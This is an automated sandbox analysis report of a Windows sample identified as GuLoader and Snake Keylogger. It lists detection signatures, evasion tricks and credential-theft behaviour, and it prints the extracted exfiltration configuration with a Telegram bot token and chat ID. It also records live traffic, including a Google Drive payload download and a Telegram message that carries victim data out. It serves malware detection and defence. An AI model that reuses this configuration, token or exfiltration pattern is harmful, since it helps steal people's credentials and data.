Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JOSXXL1.exe

Overview

General Information

Sample name:JOSXXL1.exe
Analysis ID:1542950
MD5:fb24966daab46af066a7b7c041236de9
SHA1:391bb0f3da952bbbf14b61b7f6c01175344be882
SHA256:8e5d0c237ba87f5b445c7edcf6d5ea6071fb873c64b6431f4f98527461aac37d
Tags:exeuser-threatcat_ch
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • JOSXXL1.exe (PID: 5316 cmdline: "C:\Users\user\Desktop\JOSXXL1.exe" MD5: FB24966DAAB46AF066A7B7C041236DE9)
    • JOSXXL1.exe (PID: 3492 cmdline: "C:\Users\user\Desktop\JOSXXL1.exe" MD5: FB24966DAAB46AF066A7B7C041236DE9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7511877228:AAEfdtsXiYLhmN4YbL4GOCHPaqlvykB-alc", "Chat_id": "7534008929", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000002.2971397294.0000000037451000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000000.00000002.2321723084.000000000890B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: JOSXXL1.exe PID: 3492JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: JOSXXL1.exe PID: 3492JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-26T23:57:21.167832+020028033053Unknown Traffic192.168.2.461902188.114.96.3443TCP
            2024-10-26T23:57:22.626862+020028033053Unknown Traffic192.168.2.461913188.114.96.3443TCP
            2024-10-26T23:57:24.129743+020028033053Unknown Traffic192.168.2.461922188.114.96.3443TCP
            2024-10-26T23:57:25.708387+020028033053Unknown Traffic192.168.2.461933188.114.96.3443TCP
            2024-10-26T23:57:27.148944+020028033053Unknown Traffic192.168.2.461945188.114.96.3443TCP
            2024-10-26T23:57:31.552767+020028033053Unknown Traffic192.168.2.461976188.114.96.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-26T23:57:18.573757+020028032742Potentially Bad Traffic192.168.2.461886193.122.130.080TCP
            2024-10-26T23:57:20.417495+020028032742Potentially Bad Traffic192.168.2.461886193.122.130.080TCP
            2024-10-26T23:57:21.890371+020028032742Potentially Bad Traffic192.168.2.461908193.122.130.080TCP
            2024-10-26T23:57:23.355007+020028032742Potentially Bad Traffic192.168.2.461919193.122.130.080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-26T23:57:11.745999+020028032702Potentially Bad Traffic192.168.2.461847142.250.185.238443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000004.00000002.2971397294.0000000037451000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7511877228:AAEfdtsXiYLhmN4YbL4GOCHPaqlvykB-alc", "Chat_id": "7534008929", "Version": "4.4"}
            Multi AV Scanner detection for submitted file
            Source: JOSXXL1.exeReversingLabs: Detection: 57%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D787A8 CryptUnprotectData,4_2_39D787A8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_39D78EF1 CryptUnprotectData,4_2_39D78EF1
            Source: JOSXXL1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:61896 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.4:61847 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.4:61854 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:61981 version: TLS 1.2
            Source: JOSXXL1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405974
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_004064C6 FindFirstFileW,FindClose,0_2_004064C6
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405974
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_004064C6 FindFirstFileW,FindClose,4_2_004064C6
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 0015F45Dh4_2_0015F2C0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 0015F45Dh4_2_0015F4AC
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 0015F45Dh4_2_0015F52F
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 0015FC19h4_2_0015F961
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39692C19h4_2_39692968
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 396931E0h4_2_39692DC8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3969D7F9h4_2_3969D550
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 396931E0h4_2_3969310E
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 396931E0h4_2_39692DC2
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3969DC51h4_2_3969D9A8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_39690040
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3969FAB9h4_2_3969F810
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3969D3A1h4_2_3969D0F8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3969CF49h4_2_3969CCA0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3969F209h4_2_3969EF60
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39690D0Dh4_2_39690B30
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39691697h4_2_39690B30
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3969EDB1h4_2_3969EB08
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3969F661h4_2_3969F3B8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3969E501h4_2_3969E258
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3969E0A9h4_2_3969DE00
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3969E959h4_2_3969E6B0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D79280h4_2_39D78FB0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D77EB5h4_2_39D77B78
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D762D9h4_2_39D76030
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D7ECA6h4_2_39D7E9D8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D75E81h4_2_39D75BD8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D718A1h4_2_39D715F8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D7CCB6h4_2_39D7C9E8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D7DA66h4_2_39D7D798
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D75A29h4_2_39D75780
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D7FA56h4_2_39D7F788
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D72E59h4_2_39D72BB0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D71449h4_2_39D711A0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D7BA76h4_2_39D7B7A8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D7C826h4_2_39D7C558
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D72A01h4_2_39D72758
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D70FF1h4_2_39D70D48
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D7E816h4_2_39D7E548
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D7B5E6h4_2_39D7B318
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D725A9h4_2_39D72300
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D7D5D6h4_2_39D7D308
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D779C9h4_2_39D77720
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D755D1h4_2_39D75328
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D75179h4_2_39D74ED0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D7C396h4_2_39D7C0C8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D77571h4_2_39D772C8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D70B99h4_2_39D708F0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D7F5C6h4_2_39D7F2F8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D70741h4_2_39D70498
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then mov esp, ebp4_2_39D7B081
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D76733h4_2_39D76488
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D7E386h4_2_39D7E0B8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D72151h4_2_39D71EA8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D71CF9h4_2_39D71A50
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D702E9h4_2_39D70040
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D77119h4_2_39D76E70
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D74D21h4_2_39D74A78
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D7D146h4_2_39D7CE78
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D73709h4_2_39D73460
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D7F136h4_2_39D7EE68
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D76CC1h4_2_39D76A18
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D732B1h4_2_39D73008
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D7BF06h4_2_39D7BC38
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D748C9h4_2_39D74620
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 39D7DEF6h4_2_39D7DC28
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C6970h4_2_3A7C6678
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C5986h4_2_3A7C56B8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C4746h4_2_3A7C4478
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CD768h4_2_3A7CD470
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CAC60h4_2_3A7CA968
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C0C2Eh4_2_3A7C0960
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C8158h4_2_3A7C7E60
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C3E26h4_2_3A7C3B58
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CEF50h4_2_3A7CEC58
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CC448h4_2_3A7CC150
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C5E16h4_2_3A7C5B48
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C9940h4_2_3A7C9648
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C030Eh4_2_3A7C0040
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C6E38h4_2_3A7C6B40
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C3506h4_2_3A7C3238
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CDC30h4_2_3A7CD938
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CB128h4_2_3A7CAE30
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C54F6h4_2_3A7C5228
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C8620h4_2_3A7C8328
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CF418h4_2_3A7CF120
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C2BE6h4_2_3A7C2918
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CC910h4_2_3A7CC618
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C19DEh4_2_3A7C1710
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C9E08h4_2_3A7C9B10
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C4BD7h4_2_3A7C4908
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C7300h4_2_3A7C7008
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CE0F8h4_2_3A7CDE00
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C22C6h4_2_3A7C1FF8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CB5F0h4_2_3A7CB2F8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C10BEh4_2_3A7C0DF0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C8AE8h4_2_3A7C87F0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C42B6h4_2_3A7C3FE8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CF8E0h4_2_3A7CF5E8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CCDD8h4_2_3A7CCAE0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C6347h4_2_3A7C5FD8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CA2D0h4_2_3A7C9FD8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C079Eh4_2_3A7C04D0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C77C8h4_2_3A7C74D0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CE5C0h4_2_3A7CE2C8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CBAB8h4_2_3A7CB7C0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C8FB0h4_2_3A7C8CB8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CFDA8h4_2_3A7CFAB0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C3076h4_2_3A7C2DA8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CD2A0h4_2_3A7CCFA8
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C1E47h4_2_3A7C1BA0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CA798h4_2_3A7CA4A0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C5066h4_2_3A7C4D98
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C7C90h4_2_3A7C7998
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CEA88h4_2_3A7CE790
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C2756h4_2_3A7C2488
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7CBF80h4_2_3A7CBC88
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C154Eh4_2_3A7C1280
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A7C9478h4_2_3A7C9180
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A801FE8h4_2_3A801CF0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A801190h4_2_3A800E98
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A801B20h4_2_3A801828
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A800338h4_2_3A800040
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A800CC8h4_2_3A8009D0
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A800801h4_2_3A800508
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then jmp 3A801658h4_2_3A801360
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_3A843E70
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_3A843E60
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_3A840A03
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_3A840A10

            Networking

            barindex
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.68 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20and%20Time:%2027/10/2024%20/%2006:11:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20447849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:61886 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:61919 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:61908 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:61847 -> 142.250.185.238:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61922 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61902 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61933 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61945 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61913 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:61976 -> 188.114.96.3:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1TQCyESnrOdUT1AguOSyvjh_GMhxmIcz2&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
